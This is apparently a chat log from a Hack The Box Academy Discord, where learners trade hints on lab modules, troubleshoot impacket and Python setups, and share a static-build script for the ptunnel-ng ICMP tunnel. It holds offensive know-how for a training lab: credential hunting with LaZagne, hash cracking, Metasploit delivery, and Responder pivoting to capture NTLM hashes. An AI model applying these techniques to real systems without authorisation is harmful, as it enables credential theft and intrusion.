I wanted help with installing mysql; while installing it's actually giving an error saying that mysql-server doesn't have an installation candidate
how to solve this problem
anyone could help?
Google it
yeah I did, I couldn't find any solution
This really isn't the place to ask for general support
#1024429874246590575 make a post there
Hi I have been trying to solve this question for days now its for (SOC Path) any Hints seems something off. I literally tried everything possible
By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
Hi for question 3, I answered as 34460 as the answer to the question " What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan? " and it was wrong even though I thought it showed the highest vulnerability
Hello everyone, I'm trying to do the question "Crack this user's password hash and submit the cleartext password as your answer." from Assessment 2 of the Active Directory lab:
- I found the string hash from CT... user
- But I don't know what i'm doing wrong trying to crack with correct -m option and rockyou exhausts
What Event ID or Filter do I have to pick
wrong answer, must be another one
Well obviously. I want to know how you determine what the highest critical vulnerability might be if not by score
strange, it worked for me. I'm going to dm you so you can show me the hash just to double check
well, its exactly the first one you see when you filter by "Score" even though the second one listed has the same score
the second one is 9.8. I tried looking at the Windows one and tried both the plugin IDs with a score of 8.1 (the highest one for Windows) and I still got the plugin ID wrong
it can't be, I just looked at the scan, give me another sec to spawn the machine
did you look at the "Windows_basic_authed"?
click "Back to My Scans", there is one scan named "Windows_basic_authed"
Oh okay, I see it now
click on it, see the first vuln? It must be the one to answer the question
Yes
Strange
This is the way "Nessus" sorts out the vulns based on the score. It may be a question for the dev team
It worked
can anyone help? I can't login to my HTB account even though I know my password is correct. When I tried clicking on 'forgot password' and put in my email, I'm not getting any password reset link. The email works because HTB sends me emails to the associated email address
but i do not receive it from my email
can anyone help me please with the Credential Hunting in Windows section in the Password Attacks module? I don't know how to transfer the LaZagne exe to the Windows host, I tried with scp and smb but it doesn't work
thanks
no probs
i found how, just add /drive:linux,<path> in the xfreerdp command
what are these program tasks guys
I think it's about completing modules.
oh hmm
Oh my god just finished AD enumeration & attacks, the hardest module since i started CPTS: https://academy.hackthebox.com/achievement/737/143
It was a very very good module, thanks for all who created it
that is the referral page. you'll get rewards based on the actions of people you refer and they'll show up there
Is the Information Security Foundations path a good starting point on Academy? My background is minimal: I started an IT role this January as an apprentice managed services engineer doing level 3 Azure cloud. I've got my ISC2 CC exam next month and I'm just looking to get more technical skills, especially around networking & OS fundamentals, with the idea of transitioning internally from help desk to cyber next year or so
make sure to add /dynamic-resolution, but yes /drive: is huuge as well
hmm
oh I finished that one yesterday
I thought they were pretty helpful overall. As someone with no Active Directory experience it felt like a lot to get through, but bash scripting was fun -- it probably depends on your experience level. It's a lot of walls of text, so for stuff I didn't understand I went to YouTube and watched videos and then went back to the module
also the cheatsheets are fantastic
Awesome skills assessment on the LFI module 🔥
Thank you for the informative response based on your experience, I appreciate that
The only active directory experience I have is low level user and security group management etc on domain controllers for clients
you're golden then
the networkchuck free ccna playlist goes well with the intro to networking module, subnetting was really easy with both resources
Interesting. I am sure it will be beneficial then. I have covered the basics in my apprenticeship but networking is something I feel that I need to put some more effort into for sure.
Quick pointer for people trying to run smb_delivery from Metasploit and finding it not working with the Pwnbox: try starting it with sudo msfconsole -q
This just had me in circles for the last hour
Thank you for all the suggestions, without this discord channel. I would have taken ages to complete it.
Hi, I’m new to HTB, could anyone help with a question on the Intro to Nmap module?
don't ask to ask, just ask 😛
Ok cool wanted to double check it’s allowed 😄 I’m on the first question: based on the last result, find out which operating system it belongs to. Submit the name of the OS.
So far I determined the target host after going through all the examples in this section and that’s what I’ve been running my scans against. I’m using the packet trace flag to look at the TTL to find out which OS but my results keep showing NSOCK info and I’m not sure where to go or if I’m running it against the right target
check the default ttl
in the future it's very helpful if you list the section you're on as well! i believe you're in the host discovery section?
||you're on the right path with TTL|| feel free to reach out if you need more help
im on attacking sql section lol
use google
¯\_(ツ)_/¯
you can dm me
it works for me with impacket 0.11.0
maybe consider updating if you see a tool which states it is from 2020
Anybody having an issue getting the windows.acquisition to work in the DFIR module?
I get the same error. I searched and the solution says to edit the code on some lines; I tried it but it doesn't work for me. Finally I uninstalled it and installed it using ippsec's ansible script
do you have a solution somewhere I can review to try
replaced ctx = SSL.Context(SSL.TLSv1_METHOD) with ctx = SSL.Context(SSL.TLSv1_2_METHOD) both at line 911 & 663 and now mssqlclient.py works
Tell me if this works for u please
how do i even do that lol
```
sudo nano /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg/impacket/tds.py
```
Here hit (control + f ) and search SSL.Context and change it
if you dont know where is your tds.py search it
find / -name "tds.py" 2>/dev/null
locate tds.py
👍
jajajajaja sure this will work
because your path is using the previous version
you have to give them the absolute path of the 0.11 version, or uninstall the previous version and add the new one to the path
you have to install dsinternals
open ChatGPT and paste your error, it will tell you how to solve it
i just git clone https://github.com/MichaelGrafnetter/DSInternals.git
that didnt work
hmmm
I tell you, the ippsec script is the best solution
whats that
Github Repo: https://github.com/ippsec/parrot-build
ahhh
uninstall impacket and run this
execute it on you vm!
so use ansible?
yeah
Can someone explain to me why autoroute in Metasploit doesn't work for Windows hosts
when you do AD module or Windows privesc you gonna see the stars ajajjajajaja
i installed dsinternals still same error
```
Collecting dsinternals
Downloading dsinternals-1.2.4.tar.gz (174 kB)
|████████████████████████████████| 174 kB 9.9 MB/s
ERROR: Package 'dsinternals' requires a different Python: 2.7.18 not in '>=3.4'
```
python --version
try to install it manually and use python3 instead of python
i guess im confused because i have python3 installed
wouldnt that be the most updated
but still throwing that 2.7.18 error
maybe your path is first to python and then to python3
could be, how would I check that
echo $PATH
└─# echo $PATH
/root/.cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/root/go/bin
python -c "import sys; print(sys.executable)"
/usr/bin/python
start using python virtual environments
cd /opt && mkdir impacket && cd impacket
python3 -m venv impacket && source impacket/bin/activate
and from there install it with pip3 install -r requirements.txt after cloning the repo
OR a better approach
install it with pipx, which does all of that automatically and installs the scripts system-wide
just read documentation
there's a broken dependency in my system
I was able to fix it, I had to change the alias of python to python3
then i could install dsinternals
alias python=python3.4
can some one recommend me best modules apart from pentest pathway
probably the Tier III modules based on what you want to learn / where you're struggling
i have only student sub :(
Hi guys, I'm doing the hard lab in the Attacking Common Services module. I tried to bruteforce every service and found that the SMB service is open to guest, but I'm unable to get any useful info from the shares available... any nudges?
click on Modules and then click on Tier II there are a ton of useful modules that aren't in the path
Hacking WordPress
Cracking Password with Hashcat
Anything from CBBH path (web will help if your goal is CPTS)
Intermediate Network Traffic Analysis
oh okay thanks
||take another look at SMB|| if you need further help, feel free to DM
anyone else not able to go to the academy at the moment?
Yep
for the academy?
Yep
Nice ! Work well my friend
is the academy down? again?
yeah
academy down?
why is there no down detector for it lol
its working for me
503 bad gateway? happened like 2 minutes ago
refresh
Down for me too.
Host error, so reports Cloudflare.
there is no official one for the academy, but there are a lot of sites that can check this https://downforeveryoneorjustme.com/academy.hackthebox.com?proto=https
hello, the academy seems down, right?
ah ty
my pwnbox minimizes its size everytime i switch tabs in my browser is there a fix to it?
refresh
apart from that, that solves it but is there a way to prevent it
it's Fing annoying and unfortunately nope
yep very annoying
bruh it died again
can anyone assist with SQSH commands
No way to prevent it - but you can fix it without refreshing by either slightly resizing your window(on your full screen view), or moving the browser tab around rq
ohh ok, will try it
it seems like a javascript-y kinda thing -- where "on load" and "on window resize", the fullscreen view resizes itself to match
are the machines loading slowly or is it just me?
where should I report an error? I was just looking way back at Linux Fundamentals trying to help a friend with something, and noticed this error.
Error:
"In addition to providing basic information like the current user and working directory, we can customize to display other information in the prompt, such as the date and time, IP address, date, time, "
You can see here that it shows that you are able to grab date and time twice
You can find it here:https://academy.hackthebox.com/module/18/section/66
thanks
which module?
@acoustic owl when I do a ping sweep and find 4 hosts, if the gateway (192.168.0.1) is found also, is this 5 hosts within the internal network?
Or the gateway doesn't count
Why shouldn't the gateway be one of them? It is a router and therefore a network device. If you can control it, various attacks are possible.
So it is 5 hosts not 4?
hello guys, I'm still having this issue with ptunnel-ng :
reading the documentation I followed the instruction of "./configure && make"
but the issue still persists, any idea or suggestion?
@digital pewter I saw you shared some info related to this issue before, could you please share it one more time?
Download the compiled version
https://github.com/utoni/ptunnel-ng/releases/tag/v1.42
Sure, you can modify autogen.sh to the following to have it statically compile:
```bash
#!/bin/bash
set -x
OLD_WD="$(pwd)"
# quote ${0} so a script path containing spaces still resolves correctly
NEW_WD="$(dirname "${0}")"
cd "${NEW_WD}"
if ! autoreconf -fi; then
    aclocal
    autoheader
    automake --force-missing --add-missing
    autoconf
fi
cd "${OLD_WD}"
# LDFLAGS=-static makes the linker produce a fully static binary, so the
# result no longer depends on the glibc version installed on the jump host
LDFLAGS=-static "${NEW_WD}/configure" --enable-static "$@" && make clean && make -j"${BUILDJOBS:-4}" all
```
thank u both
Hi everyone! Just one question about AD: Let's say attacker host A compromises a remote Linux server B, which can reach the hosts from the internal AD network. Right now it's not possible to install Responder on Linux server B, but is there a way to run Responder on attacker host A to capture NTLM hashes from the internal network?
What exactly does a VPN have to do with file transfer?
everything works at layer 2, so I haven't seen this case reported anywhere yet, but maybe this article is what you are looking for:
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/
I had a quick look so I actually don't know if the content is good or not
GOTCHA
could def use help with the sql part of that section
Thank you, I'll take a look 🙂
hey man, I really appreciate your help, I could finish the ICMP tunneling thanks to you....
hi. I'm new here.
this is for module discussion not introductions
read #welcome
🤙
Has anyone tried listing accessible SMB shares using Kerberos authentication from Linux?

